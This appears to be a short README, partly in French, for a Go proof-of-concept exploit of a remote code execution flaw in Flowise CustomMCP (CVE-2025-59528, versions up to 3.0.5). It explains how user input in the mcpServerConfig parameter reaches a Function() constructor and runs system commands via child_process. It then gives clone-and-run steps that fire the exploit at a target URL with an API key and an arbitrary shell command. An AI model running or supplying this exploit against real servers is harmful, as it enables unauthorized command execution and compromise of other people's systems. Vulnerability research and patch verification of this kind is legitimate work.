
Go Proof of Concept (PoC) exploit for Flowise CustomMCP Remote Code Execution (RCE) CVE-2025-59528
Une preuve de concept en Go pour CVE-2025-59528 ciblant les versions de Flowise <= 3.0.5.
Flowise permet l'exécution de JavaScript non validé via la configuration du nœud CustomMCP. L'application transmet l'entrée fournie par l'utilisateur dans le paramètre mcpServerConfig directement dans un constructeur Function() au sein de la fonction backend convertToValidJSONString. Cela évalue le code avec tous les privilèges Node.js, permettant l'exécution arbitraire de commandes système via child_process.
git clone https://github.com/Moon-Harvest/CVE-2025-59528
cd CVE-2025-59528/
go run main.go <target-base-url> <api-key> <command>
go run main.go http://target.com h3D_9jD7Xzi0V2KSrld9ff4P3rm6cuNXg1uA-wFsUYc "touch /tmp/pwned"